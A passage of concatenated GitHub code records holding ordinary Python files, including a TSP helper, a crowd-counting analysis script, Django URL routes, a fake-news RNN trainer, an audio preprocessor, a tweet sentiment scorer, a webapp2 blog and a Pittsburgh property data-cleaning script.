num_cols))\n\n # Fill the matrix with the values from the dictionary\n for key, value in zip(keys, values):\n matrix[key] = value\n\n return matrix\n\ndef dict_to_vect(dictionary):\n # Extract the keys and values from the dictionary\n keys = list(dictionary.keys())\n values = list(dictionary.values())\n\n # Determine the matrix dimensions based on the keys\n num_rows = len(values)\n\n # Create the NumPy matrix\n matrix = np.zeros(num_rows)\n\n # Fill the matrix with the values from the dictionary\n for key, value in zip(keys, values):\n matrix[key] = value\n\n return matrix\n\n# Map the state vector back to the city index in a schedule vector\ndef parse_op_vec_tsp(sample, N):\n dim = N\n m = np.empty([dim, dim])\n sch = np.empty([dim])\n for i in range(dim):\n for j in range(dim):\n m[i, j] = sample[j + i * dim]\n if m[i, j] == 1:\n sch[j] = i\n return m, sch.astype(int)\n\ndef get_distance(distanceMatrix, sch, N):\n distance = 0\n for p in range(N-1):\n length = distanceMatrix[sch[p]][sch[p+1]]\n distance = distance + length\n length = distanceMatrix[sch[N-1]][sch[0]]\n distance = distance + length; \n return distance\n","repo_name":"neuromorphs/NeuroP","sub_path":"examples/tsp_demo/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":4640,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"73099757171","text":"import h5py\nimport scipy.io as io\nimport PIL.Image as Image\nimport numpy as np\nimport os\nimport glob\nfrom matplotlib import pyplot as plt\nfrom scipy.ndimage.filters import gaussian_filter\nimport scipy.spatial\nimport scipy\nimport cv2\nfrom matplotlib import cm as CM\nimport random\nimport torchvision\nimport sys\nfrom saver.checkpoints1_local_try0.net1_local_temp import net1_local\nimport torch\nimport torchvision.transforms.functional as F\nfrom data.single_image_loader2 import SingleImageDataset\nfrom torchvision import datasets, transforms\n\n\ndef get_one_image(img_path): # 返回dataset里面的那张image\n img_path = os.path.join(img_path)\n img = Image.open(img_path).convert('RGB')\n img = img.resize((1024, 1024), Image.ANTIALIAS)\n return img\n\n\ndef get_one_gt(gt_path): # dataset中image大小和gt大小相同,为了和dataloader1_temp保持一致,将gt resize到128x128大小\n gt_file = h5py.File(gt_path, 'r')\n gt_density_map = np.asarray(gt_file['density'])\n\n original_gt_sum = np.sum(gt_density_map)\n gt_density_map = cv2.resize(gt_density_map, (128, 128), interpolation=cv2.INTER_CUBIC)\n current_gt_sum = np.sum(gt_density_map)\n gt_density_map = gt_density_map * (original_gt_sum / current_gt_sum)\n\n return gt_density_map\n\n\n# 得到第一个任务中0-1任务得到的人群分布图以及最终的密度图\ndef get_images(img_path, gt_path, checkpoint_save_dir, checkpoint_name, train_gpu_id, test_gpu_id, transform=None):\n device = torch.device(test_gpu_id if torch.cuda.is_available() else 'cpu')\n if train_gpu_id != test_gpu_id:\n checkpoint = torch.load(os.path.join(checkpoint_save_dir, checkpoint_name), map_location={train_gpu_id:test_gpu_id})\n else:\n checkpoint = torch.load(os.path.join(checkpoint_save_dir, checkpoint_name))\n\n net = net1_local()\n net.load_state_dict(checkpoint['state_dict'])\n net.to(device)\n net.eval()\n\n dataset = SingleImageDataset(img_path=img_path,\n gt_path=gt_path,\n transform=transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\n ]),\n )\n data_loader = torch.utils.data.DataLoader(dataset, shuffle=False, batch_size=1, num_workers=1)\n\n for i, data in enumerate(data_loader, 0):\n image, gt_density_map = data\n image = image.to(device)\n predict_density_map, predict_value, predict_cam64_image = net(image) # 分别是:第二个任务预测的density map, 第一个任务预测的有人-无人的value, 第一个任务对应的cam64的图\n\n # predict_data = predict.data.squeeze()\n # image = image.data.squeeze()\n # gt = gt.data.squeeze()\n # print('1', predict_data.shape)\n\n return predict_density_map.data.squeeze(), predict_cam64_image.data.squeeze()\n\n\ndef convert_one_img_path_2_gt_path(img_path):\n return img_path.replace('.jpg', '.h5').replace('image', 'gt')\n\n\ndef show_images(img_path, checkpoint_save_dir, checkpoint_name, train_gpu_id, test_gpu_id, transform=None):\n gt_path = convert_one_img_path_2_gt_path(img_path)\n img = get_one_image(img_path)\n gt = get_one_gt(gt_path)\n\n density_map, cam64_img = get_images(img_path, gt_path, checkpoint_save_dir, checkpoint_name, train_gpu_id, test_gpu_id, transform=None)\n\n plt.figure(figsize=(50, 50))\n\n plt.subplot(3, 3, 1)\n plt.title('img')\n plt.imshow(img)\n\n plt.subplot(3, 3, 2)\n plt.title('gt')\n plt.imshow(gt)\n\n plt.subplot(3, 3, 3)\n plt.title('cam64_0')\n plt.imshow(cam64_img[0])\n\n plt.subplot(3, 3, 4)\n plt.title('cam64_1')\n plt.imshow(cam64_img[1])\n\n plt.subplot(3, 3, 5)\n plt.title('cam64_add')\n plt.imshow(cam64_img[1] - cam64_img[0])\n\n plt.subplot(3, 3, 6)\n plt.title('density map')\n plt.imshow(density_map)\n\n plt.show()\n plt.close()\n\n\nif __name__ == '__main__':\n dataset = 'A'\n test_img_dir = '/home/rainkeeper/Projects/Datasets/shanghaiTech/processed_CSRNet_uncrop_data_gpu0/part_' + dataset + '/test_image'\n\n test_img_name = 'IMG_110.jpg'\n\n checkpoint_save_dir = '/home/rainkeeper/Projects/PycharmProjects/rain4/saver/checkpoints1_local_try0/'\n checkpoint_name = 'Dataset_A108_69.4_90.03checkpoint.pth.tar'\n\n train_gpu_id = 'cuda:0' # checkpoints是由哪个gpu生成的\n test_gpu_id = 'cuda:0' # 当前analysis任务所用的gpu id\n\n test_img_path = os.path.join(test_img_dir, test_img_name)\n show_images(test_img_path, checkpoint_save_dir, checkpoint_name, train_gpu_id, test_gpu_id, transform=None)\n","repo_name":"imrainkeeper/FMGNet","sub_path":"analysis/analysis_net0_local.py","file_name":"analysis_net0_local.py","file_ext":"py","file_size_in_byte":4774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8321445451","text":"\"\"\"manga URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.0/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf import settings\nfrom django.contrib import admin\nfrom django.urls import path, re_path\nfrom django.contrib.staticfiles.urls import staticfiles_urlpatterns\nimport manga.views as views\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n re_path('manga/(?P.*/)(?P.*.zip)', views.mangaView, name='mangaView'),\n re_path('manga/(?P.*/)(?P.*.cbz)', views.mangaView, name='mangaView'),\n re_path('manga/(?P.*/)(?P.*.rar)', views.mangaView, name='mangaView'),\n re_path('manga/(?P.*/)(?P.*.cbr)', views.mangaView, name='mangaView'),\n re_path('manga/(?P.*/)(?P.*.pdf)', views.fileView, name='fileView'),\n re_path('manga/(?P.*/)(?P.*.txt)', views.fileView, name='fileView'),\n re_path('manga/(?P.*)', views.index, name='index'),\n re_path('search/.*', views.search, name='index'),\n re_path('unwatch/(?P.*)', views.unwatch),\n re_path('watch/(?P.*)', views.watch),\n path('', views.home, name='home'),\n]\n\nurlpatterns += staticfiles_urlpatterns()\n","repo_name":"jkflw/manga-server","sub_path":"manga/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34251490630","text":"from NLPLib.DSP import RNNDataset, PadSequence\nfrom NLPLib.network import FakeNewsClassifier\nfrom tqdm import tqdm\nimport numpy as np\nimport argparse\nfrom terminaltables import AsciiTable\n\n\nfrom torch.nn.utils import clip_grad_norm_\nfrom torch.utils.data import DataLoader\nfrom torch import optim, nn\nimport torch\n\n# The special symbols to be added at the end of strings\nSTART_SYMBOL = ''\nEND_SYMBOL = ''\n\nPADDING_WORD = ''\nUNKNOWN_WORD = ''\n\n\nif __name__ == \"__main__\":\n \n #Args =============================================\n parser = argparse.ArgumentParser(description='')\n parser.add_argument('-ef', '--embeddings', default='', help='A file with word embeddings')\n parser.add_argument('-bs', '--batch_size', type=int, default=250, help='Batch size')\n parser.add_argument('-e', '--epochs', type=int, default=10, help='Number of epochs')\n parser.add_argument('-lr', '--learning_rate', type=float, default=0.01, help='Learning rate')\n \n args = parser.parse_args()\n \n \n is_cuda_available = torch.cuda.is_available()\n print(\"Is CUDA available? {}\".format(is_cuda_available))\n if is_cuda_available:\n print(\"Current device: {}\".format(torch.cuda.get_device_name(0)))\n else:\n print('Running on CPU')\n print()\n\n device = 'cuda' if torch.cuda.is_available() else 'cpu'\n \n # Preparing datasets ==============================\n dataset = RNNDataset(lenSequence=100)\n training_loader = DataLoader(dataset, args.batch_size, collate_fn=PadSequence())\n \n \n # Prepare network training ========================\n network = FakeNewsClassifier(\"glove.6B.50d.txt\", device=device, hidden_size=128)\n \n criterion = nn.BCELoss()\n optimizer = optim.Adam(network.parameters(), lr=args.learning_rate)\n \n network.train()\n \n for epoch in range( args.epochs ):\n lossAverage = 0\n for samples, labels in tqdm(training_loader, desc=\"Epoch {}\".format(epoch + 1)):\n \n \n optimizer.zero_grad()\n \n logits = network(samples)\n logits_shape = logits.shape\n \n loss = criterion(logits[:,0], torch.tensor(labels, dtype=torch.float).to(device))\n loss.backward()\n \n lossAverage += loss.item()\n \n clip_grad_norm_(network.parameters(), 5)\n optimizer.step()\n \n print(f\"Epoch average loss: {lossAverage / len(training_loader)}\")\n \n # Evaluation\n network.eval()\n confusion_matrix = [[0, 0],\n [0, 0]]\n\n dataset.setTraning = False\n testing_loader = DataLoader(dataset, args.batch_size, collate_fn=PadSequence())\n \n for x, y in tqdm(testing_loader, desc=\"Testing set\"):\n result = network(x)\n pred = torch.round(result).cpu().detach().numpy().reshape(-1,)\n y = np.array(y)\n\n tp = np.sum(pred[y == 1])\n tn = np.sum(1 - pred[y == 0])\n fp = np.sum(1 - y[pred == 1])\n fn = np.sum(y[pred == 0])\n\n confusion_matrix[0][0] += tn\n confusion_matrix[1][1] += tp\n confusion_matrix[0][1] += fp\n confusion_matrix[1][0] += fn\n\n table = [['', 'Predicted Fake', 'Predicted True'],\n ['Real Fake', confusion_matrix[0][0], confusion_matrix[0][1]],\n ['Real True', confusion_matrix[1][0], confusion_matrix[1][1]]]\n\n t = AsciiTable(table)\n print(t.table)\n print(\"Accuracy: {}\".format(\n round((confusion_matrix[0][0] + confusion_matrix[1][1]) / np.sum(confusion_matrix), 4))\n )\n","repo_name":"Fake-News-Detection-Project/Fake-News-Detection","sub_path":"true_fake_rnn.py","file_name":"true_fake_rnn.py","file_ext":"py","file_size_in_byte":3606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5209513492","text":"import pathlib\nimport os\nimport tempfile\n\nimport ffmpeg\n\n\nclass AudioPreProcessor:\n def __init__(self):\n self.tmpdir = None\n self.output_path = None\n self.error = None\n\n def process(self, audio_file):\n # create a new temp dir for every run\n self.tmpdir = pathlib.Path(tempfile.mkdtemp())\n self.output_path = str(self.tmpdir / 'audio.wav')\n self.error = None\n\n # converts audio file to 16kHz 16bit mono wav...\n print('pre-processing audio file...')\n stream = ffmpeg.input(audio_file, vn=None, hide_banner=None)\n stream = stream.output(self.output_path, format='wav',\n acodec='pcm_s16le', ac=1, ar='16k').overwrite_output()\n try:\n ffmpeg.run(stream, capture_stdout=True, capture_stderr=True)\n except ffmpeg.Error as e:\n self.error = e.stderr.decode('utf8')\n\n def cleanup(self):\n if os.path.exists(self.output_path):\n os.remove(self.output_path)\n if self.tmpdir:\n self.tmpdir.rmdir()\n","repo_name":"meronym/speaker-transcription","sub_path":"lib/audio.py","file_name":"audio.py","file_ext":"py","file_size_in_byte":1069,"program_lang":"python","lang":"en","doc_type":"code","stars":70,"dataset":"github-code","pt":"21"} +{"seq_id":"17402016673","text":"'''\r\nthe function of this program is to separate each list of tweets into their regions and bodies\r\nthe function then takes each region and body and calculates the sentiment score of each tweet, and\r\nfinally adds up all of the scores and finds the average happiness score for each region\r\n'''\r\nimport string\r\n#given coordinate values for latitude and longitude\r\np1 = (49.189787, -67.444574)\r\np2 = (24.660845, -67.444574)\r\np3 = (49.189787, -87.518395)\r\np4 = (24.660845, -87.518395)\r\np5 = (49.189787, -101.998892)\r\np6 = (24.660845, -101.998892)\r\np7 = (49.189787, -115.236428)\r\np8 = (24.660845, -115.236428)\r\np9 = (49.189787, -125.242264)\r\np10 = (24.660845, -125.242264)\r\n\r\n#function checks to see if each latitude and longitude are within the specified regions\r\ndef TimeZone(latLongList):\r\n if latLongList[0] > p1[0] or latLongList[0] < p2[0] or latLongList[1] > p1[1] or latLongList[1] < p9[1]:\r\n zone = \"Not within any timezone\"\r\n elif latLongList[1] <= p1[1] and latLongList[1] >= p3[1]:\r\n zone = \"Eastern\"\r\n elif latLongList[1] < p3[1] and latLongList[1] >= p5[1]:\r\n zone = \"Central\"\r\n elif latLongList[1] < p5[1] and latLongList[1] >= p7[1]:\r\n zone = \"Mountain\"\r\n else:\r\n zone = \"Pacific\"\r\n return zone\r\n\r\n#function splits each tweet into its latitude and longitude as well as the body of the tweet\r\ndef ChangedTweet(tweet):\r\n tweetSplit = tweet.split()\r\n tweetLatLong = (tweetSplit)[0:2]\r\n tweetText = (tweetSplit)[5:]\r\n #removes the punctuation from the latitude and longitude and puts it into a list\r\n newLatLong = [tweetLatLong[0].strip(\"[],\"), tweetLatLong[1].strip(\"[],\")]\r\n return newLatLong, tweetText\r\n\r\n#function computes each tweet and calculates the happiness scores, keyword tweets, and total tweets for each region\r\ndef compute_tweets(tweets, keywords):\r\n try:\r\n #open and read each file\r\n tweetsFile = open(tweets, \"r\" , encoding=\"utf-8\")\r\n keywordsFile = open(keywords, \"r\" , encoding=\"utf-8\")\r\n #read the current tweet\r\n tweetCurrent = tweetsFile.readline()\r\n\r\n #values for calculations\r\n totalEast = 0\r\n totalCentral = 0\r\n totalMountain = 0\r\n totalPacific = 0\r\n\r\n hapScoreEast = 0\r\n hapScoreCentral = 0\r\n hapScoreMountain = 0\r\n hapScorePacific = 0\r\n\r\n keywordTweetsEast = 0\r\n keywordTweetsCentral = 0\r\n keywordTweetsMountain = 0\r\n keywordTweetsPacific = 0\r\n\r\n tweetsEast = 0\r\n tweetsCentral = 0\r\n tweetsMountain = 0\r\n tweetsPacific = 0\r\n\r\n keywordsList = []\r\n #creates a list for keywords and splits the file into keywords and their sentiment values\r\n for keywordsRow in keywordsFile:\r\n splitKeywords = keywordsRow.split(\",\")\r\n keywordsList.append(splitKeywords)\r\n\r\n #while the current tweet is not empty\r\n while tweetCurrent != \"\":\r\n #create a list for latitude and longitude by converting its values into floats and adding them to the list\r\n LatLongList = []\r\n for tweet in ChangedTweet(tweetCurrent)[0]:\r\n LatLongList.append(float(tweet))\r\n tweetText = ChangedTweet(tweetCurrent)[1]\r\n #if the timezone is Eastern, add one for the region and if the current word is a keyword, add it to the total\r\n if TimeZone(LatLongList) == \"Eastern\":\r\n tweetsEast += 1\r\n sentimentTotal = 0\r\n keywordTotal = 0\r\n for char in tweetText:\r\n changedText = (char.strip(string.punctuation)).lower()\r\n for keyword in keywordsList:\r\n if changedText == keyword[0]:\r\n sentimentTotal += int(keyword[1])\r\n keywordTotal += 1\r\n #calculate the total eastern tweets\r\n try:\r\n totalEastDivided = sentimentTotal / keywordTotal\r\n if totalEastDivided != 0:\r\n keywordTweetsEast += 1\r\n totalEast += totalEastDivided\r\n except ZeroDivisionError:\r\n totalEastDivided = 0\r\n #if the timezone is Central, add one for the region and if the current word is a keyword, add it to the total\r\n elif TimeZone(LatLongList) == \"Central\":\r\n tweetsCentral += 1\r\n sentimentTotal = 0\r\n keywordTotal = 0\r\n for char in tweetText:\r\n changedText = (char.strip(string.punctuation)).lower() # removes trailing/leading punctuation of each word and turns into lowercase\r\n for keyword in keywordsList: # for each pairing in my keywords list, compare to the current word being looked at\r\n if changedText == keyword[0]:\r\n sentimentTotal += int(keyword[1])\r\n keywordTotal += 1\r\n #calculate the total Central tweets\r\n try:\r\n totalCentralDivided = sentimentTotal / keywordTotal\r\n if totalCentralDivided != 0:\r\n keywordTweetsCentral += 1\r\n totalCentral += totalCentralDivided\r\n except ZeroDivisionError:\r\n totalCentralDivided = 0\r\n #if the timezone is Mountain, add one for the region and if the current word is a keyword, add it to the total\r\n elif TimeZone(LatLongList) == \"Mountain\":\r\n tweetsMountain += 1\r\n sentimentTotal = 0\r\n keywordTotal = 0\r\n for char in tweetText:\r\n changedText = (char.strip(string.punctuation)).lower() # removes trailing/leading punctuation of each word and turns into lowercase\r\n for keyword in keywordsList: # for each pairing in my keywords list, compare to the current word being looked at\r\n if changedText == keyword[0]:\r\n sentimentTotal += int(keyword[1])\r\n keywordTotal += 1\r\n #calculate the total Mountain tweets\r\n try:\r\n totalMountainDivided = sentimentTotal / keywordTotal\r\n if totalMountainDivided != 0:\r\n keywordTweetsMountain += 1\r\n totalMountain += totalMountainDivided\r\n except ZeroDivisionError:\r\n totalMountainDivided = 0\r\n #if the timezone is Pacific, add one for the region and if the current word is a keyword, add it to the total\r\n elif TimeZone(LatLongList) == \"Pacific\":\r\n tweetsPacific += 1\r\n sentimentTotal = 0\r\n keywordTotal = 0\r\n for char in tweetText:\r\n changedText = (char.strip(string.punctuation)).lower() # removes trailing/leading punctuation of each word and turns into lowercase\r\n for keyword in keywordsList: # for each pairing in my keywords list, compare to the current word being looked at\r\n if changedText == keyword[0]:\r\n sentimentTotal += int(keyword[1])\r\n keywordTotal += 1\r\n #calculate the total Pacific tweets\r\n try:\r\n totalPacificDivided = sentimentTotal / keywordTotal\r\n if totalPacificDivided != 0:\r\n keywordTweetsPacific += 1\r\n totalPacific += totalPacificDivided\r\n except ZeroDivisionError:\r\n totalPacificDivided = 0\r\n #read the next tweet in the file\r\n tweetCurrent = tweetsFile.readline()\r\n\r\n #calculate the happiness scores for each region\r\n if keywordTweetsEast != 0:\r\n hapScoreEast = totalEast / keywordTweetsEast\r\n else:\r\n hapScoreEast = 0\r\n if keywordTweetsCentral != 0:\r\n hapScoreCentral = totalCentral / keywordTweetsCentral\r\n else:\r\n hapScoreCentral = 0\r\n if keywordTweetsMountain != 0:\r\n hapScoreMountain = totalMountain / keywordTweetsMountain\r\n else:\r\n hapScoreMountain = 0\r\n if keywordTweetsPacific != 0:\r\n hapScorePacific = totalPacific / keywordTweetsPacific\r\n else:\r\n hapScorePacific = 0\r\n\r\n #update each region's tuple with the values\r\n return[(hapScoreEast, keywordTweetsEast, tweetsEast),\r\n (hapScoreCentral, keywordTweetsCentral, tweetsCentral),\r\n (hapScoreMountain, keywordTweetsMountain, tweetsMountain),\r\n (hapScorePacific, keywordTweetsPacific, tweetsPacific)]\r\n\r\n except IOError:\r\n print(\"Sorry, the file you entered does not exist\")\r\n return []\r\n\r\n\r\n","repo_name":"wzhan772/sentimentAnalysis","sub_path":"sentimentAnalysis.py","file_name":"sentimentAnalysis.py","file_ext":"py","file_size_in_byte":8960,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27184855341","text":"import pandas as pd\nimport numpy as np\n\ndef add_customers():\n from .connection import mydb, mycursor\n\n People = pd.read_csv(\"./db_initialization/RandomPeople.csv\")\n\n for i in range(len(People)-20):\n first_name = People['firstname'][i].replace(\"'\",\"\")\n last_name = People['lastname'][i].replace(\"'\",\"\")\n id = People['ID_Number'][i]\n id_type = People['ID_Type'][i]\n id_issue = People['ID_Issue'][i]\n birth_date = People['birthdate'][i]\n \n sqlFormula = \"\"\"INSERT INTO customers (first_name,last_name,birth_date,id,id_type,id_issue) \n VALUES ('{}','{}','{}',{},'{}','{}')\"\"\".format(first_name,last_name,birth_date,id,id_type,id_issue)\n mycursor.execute(sqlFormula)\n mydb.commit() \n sqlFormula = \"\"\"INSERT INTO customer_phones (NFC_ID,phone_number)\n VALUES ({},{})\"\"\".format(i+1,People['phone'][i])\n mycursor.execute(sqlFormula)\n mydb.commit() \n if i % 5 == 0:\n sqlFormula = \"\"\"INSERT INTO customer_phones (NFC_ID,phone_number)\n VALUES ({},{})\"\"\".format(i+1,People['phone2'][i])\n mycursor.execute(sqlFormula)\n mydb.commit() \n\n \n sqlFormula = \"\"\"INSERT INTO customer_emails (NFC_ID,email_address)\n VALUES ({},'{}')\"\"\".format(i+1,People['email'][i].replace(\"'\",\"\"))\n mycursor.execute(sqlFormula)\n mydb.commit() \n if i % 7 == 0:\n sqlFormula = \"\"\"INSERT INTO customer_emails (NFC_ID,email_address)\n VALUES ({},'{}')\"\"\".format(i+1,People['email2'][i].replace(\"'\",\"\"))\n mycursor.execute(sqlFormula)\n mydb.commit() \n\n","repo_name":"ThanosBb3/Database_Project","sub_path":"db_initialization/addCustomers.py","file_name":"addCustomers.py","file_ext":"py","file_size_in_byte":1720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37046666943","text":"import os\nimport re\nfrom string import letters\n\nimport webapp2\nimport jinja2\n\nfrom google.appengine.ext import db\n\ntemplate_dir = os.path.join(os.path.dirname(__file__), 'templates')\njinja_env = jinja2.Environment(loader = jinja2.FileSystemLoader(template_dir),\n autoescape = True)\n\ndef render_str(template, **params):\n t = jinja_env.get_template(template)\n return t.render(params)\n\nclass BlogHandler(webapp2.RequestHandler):\n def write(self, *a, **kw):\n self.response.out.write(*a, **kw)\n\n def render_str(self, template, **params):\n return render_str(template, **params)\n\n def render(self, template, **kw):\n self.write(self.render_str(template, **kw))\n\n def render_post(response, post):\n response.out.write('' + post.subject + '
')\n response.out.write(post.content)\n\nclass MainPage(BlogHandler):\n def get(self):\n t = jinja_env.get_template(\"base.html\")\n content = t.render()\n self.response.write(content)\n\nclass Post(db.Model):\n subject = db.StringProperty(required = True)\n content = db.TextProperty(required = True)\n created = db.DateTimeProperty(auto_now_add = True)\n\nclass BlogFront(BlogHandler):\n def get(self):\n posts = db.GqlQuery(\"SELECT * FROM Post ORDER BY created DESC LIMIT 5\")\n template = jinja_env.get_template(\"front.html\")\n page = template.render(posts=posts)\n self.response.write(page)\n\n\nclass ViewPostHandler(BlogHandler):\n def get(self, id):\n post = Post.get_by_id(int(id))\n self.render(\"permalink.html\", post = post)\n\nclass NewPost(BlogHandler):\n def get(self):\n self.render(\"newpost.html\")\n\n def post(self):\n subject = self.request.get('subject')\n content = self.request.get('content')\n\n if subject and content:\n posts = Post(subject = subject, content = content)\n posts.put()\n idTag = posts.key().id()\n self.redirect('/blog/%s'% idTag)\n\n else:\n error = \"dude, come on!\"\n self.render(\"newpost.html\", subject=subject, content=content, error=error)\n\n\napp = webapp2.WSGIApplication([('/', MainPage),\n ('/blog/?', BlogFront),\n webapp2.Route('/blog/', ViewPostHandler),\n ('/blog/newpost', NewPost)\n ],\n debug=True)\n","repo_name":"kevinarehart/build-a-blog","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1100944853","text":"\n# coding: utf-8\n\n# In[1]:\n\n# importing relevant libraries\nimport matplotlib\n# Force matplotlib to not use any Xwindows backend.\n# matplotlib.use('Agg')\nimport pandas as pd\nimport numpy as np\nimport sqlalchemy as sa\nimport matplotlib.pyplot as plt\n# from sklearn.decomposition import PCA\n# from sklearn.preprocessing import scale\nimport pandas as pd\nfrom sklearn import datasets, linear_model, cross_validation, grid_search\nimport numpy as np\nimport pandas as pd\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.cross_validation import KFold, StratifiedKFold, cross_val_score\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.metrics import classification_report\nfrom sklearn.model_selection import TimeSeriesSplit\nfrom sklearn_pandas import DataFrameMapper\nfrom sklearn.preprocessing import OneHotEncoder\nfrom sklearn import metrics\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import cohen_kappa_score\nfrom xgboost import XGBClassifier\nfrom sklearn.ensemble import ExtraTreesClassifier\nfrom sklearn.feature_selection import SelectFromModel\nfrom sklearn.metrics import accuracy_score\nfrom scipy import interp\nimport datetime\nfrom datetime import date\nfrom dateutil.relativedelta import relativedelta\nimport os\nimport functools\n\n# Turn off pandas chained assignment warning\npd.options.mode.chained_assignment = None # default='warn'\npd.options.display.max_columns = 999\n\n\n# ### 1. CLEAN PLI, PITT & TAX DATA\n\n# In[2]:\n\n# create directory paths for opening files\ncurr_path = os.path.dirname(os.path.realpath(__file__))\n# curr_path = os.path.dirname(os.path.realpath(\"fs_grid.ipynb\"))\ndataset_path = os.path.join(curr_path, \"datasets/\")\ninter_path = os.path.join(curr_path,\"interResults/\")\npng_path = os.path.join(curr_path,\"images/\")\n\n# read in data\n# Reading plidata\nplidata = pd.read_csv(os.path.join(dataset_path, \"pli.csv\"), encoding='utf-8', dtype={'STREET_NUM': 'str', 'STREET_NAME': 'str'}, low_memory=False)\n# Reading city of Pittsburgh dataset\npittdata = pd.read_csv(os.path.join(dataset_path, \"pittdata.csv\"), encoding=\"ISO-8859-1\", dtype={'PROPERTYADDRESS': 'str', 'PROPERTYHOUSENUM': 'str', 'CLASSDESC': 'str'}, low_memory=False)\n# Reading tax data\ntaxdata = pd.read_csv(\"./datasets/tax.csv\", encoding='utf-8')\n#read parcel data (matches parcels to census tract and block group\nparcel = pd.read_csv(os.path.join(dataset_path, \"parcels.csv\"), encoding='utf-8')\n#read ACS data\nacs_data = ['acs_income.csv','acs_occupancy.csv','acs_year_built.csv','acs_year_moved.csv']\ndef clean_acs(df):\n #Use descriptive names in first row\n df.columns = df.loc[0]\n df = df.drop(0)\n df = df.drop(['Id', 'Id2'], axis=1)\n #Extract census block and tract\n df[['BLOCKCE10', 'TRACTCE10']] = df['Geography'].str.extract(\n 'Block Group (\\d), Census Tract (\\d+\\.?\\d*)')\n df = df.drop(['Geography'], axis=1)\n #Drop first two columns since they only contain totals\n df = df.drop(df.columns[[0,1]], axis=1)\n #Drop margin of errors\n df = df.drop(df.columns[df.columns.str.startswith('Margin')], axis=1)\n #Convert to numbers\n df['BLOCKCE10'] = df['BLOCKCE10'].astype('float')\n df['TRACTCE10'] = df['TRACTCE10'].astype('float')\n #Multiply tract by 100 to be consistent with other data\n df['TRACTCE10'] = df['TRACTCE10'] * 100\n return df\nacs_data = map(lambda x: os.path.join(dataset_path, x), acs_data)\nacs_data = map(pd.read_csv, acs_data)\nacs_data = map(clean_acs, acs_data)\n#Merge datasets together\nacs_data_combined = functools.reduce(lambda x,y:x.merge(y, how='outer', on=['BLOCKCE10','TRACTCE10']), acs_data)\n\n# cleaning pitt dataset\n# removing all properties outside Pittsburgh, Wilkinsburg, and Ingram\npittdata = pittdata[(pittdata.PROPERTYCITY == 'PITTSBURGH')] # & (pittdata.PROPERTYCITY == 'WILKINSBURG') & (pittdata.PROPERTYCITY == 'INGRAM')]\n# include only residential data\npittdata = pittdata[pittdata['CLASSDESC'] == 'RESIDENTIAL']\naddress_parcels = pittdata[['PARID','PROPERTYADDRESS','PROPERTYHOUSENUM']].drop_duplicates()\npittdata = pittdata[pittdata['PROPERTYHOUSENUM'] != '0']\npittdata = pittdata[pittdata['PROPERTYADDRESS'] != '']\n# dropping columns with less than 15% data\npittdata = pittdata.dropna(thresh=4000, axis=1)\npittdata = pittdata.rename(columns={pittdata.columns[0]: 'PARID'})\n# pick out necessary columns\npittdata = pittdata[['PARID','PROPERTYHOUSENUM','PROPERTYADDRESS','MUNIDESC','SCHOOLDESC','NEIGHCODE',\n 'TAXDESC','OWNERDESC','USEDESC','LOTAREA','SALEPRICE','FAIRMARKETBUILDING','FAIRMARKETLAND']]\npittdata = pittdata.drop_duplicates()\n\n# cleaning pli dataset\n# removing extra whitespaces\nplidata['STREET_NAME'] = plidata['STREET_NAME'].str.strip()\nplidata['STREET_NUM'] = plidata['STREET_NUM'].str.strip()\n# include only residential data\nplidata = pd.merge(plidata, address_parcels[['PARID']], how='inner',left_on=['PARCEL'], right_on=['PARID'])\n# pick out necessary columns\nplidata=plidata[['PARCEL', 'INSPECTION_DATE', 'INSPECTION_RESULT', 'VIOLATION']]\n# converting to datetime\nplidata.INSPECTION_DATE = pd.to_datetime(plidata.INSPECTION_DATE)\nplidata['violation_year'] = plidata['INSPECTION_DATE'].map(lambda x: x.year)\nplidata = plidata.drop_duplicates()\n\n# cleaning tax dataset\n# removing all properties outside Pittsburgh, Wilkinsburg, and Ingram\ntaxdata = taxdata[(taxdata.municipality == 'Pittsburgh')] # & (tax.municipality == 'Wilkinsburg Boro') & (tax.municipality == 'Ingram Boro')]\ntaxdata = taxdata.dropna(subset=['pin', 'tax_year', 'lien_description', 'amount', 'satisfied'])\n# include only residential data\ntaxdata = pd.merge(taxdata, address_parcels[['PARID']], how='inner', left_on=['pin'], right_on=['PARID'])\n# pick out necessary columns\ntaxdata = taxdata[['pin', 'filing_date', 'tax_year', 'lien_description', 'amount','satisfied']]\ntaxdata.filing_date = pd.to_datetime(taxdata.filing_date)\ntaxdata.tax_year=taxdata['tax_year'].apply(lambda x: date(x,12,31))\ntaxdata.tax_year = pd.to_datetime(taxdata.tax_year)\ntaxdata = taxdata.drop_duplicates()\n\n# cleaning parcel dataset\n# keep only parcel, tract, and block group\nparcel = parcel[(parcel.geo_name_cousub == 'Pittsburgh 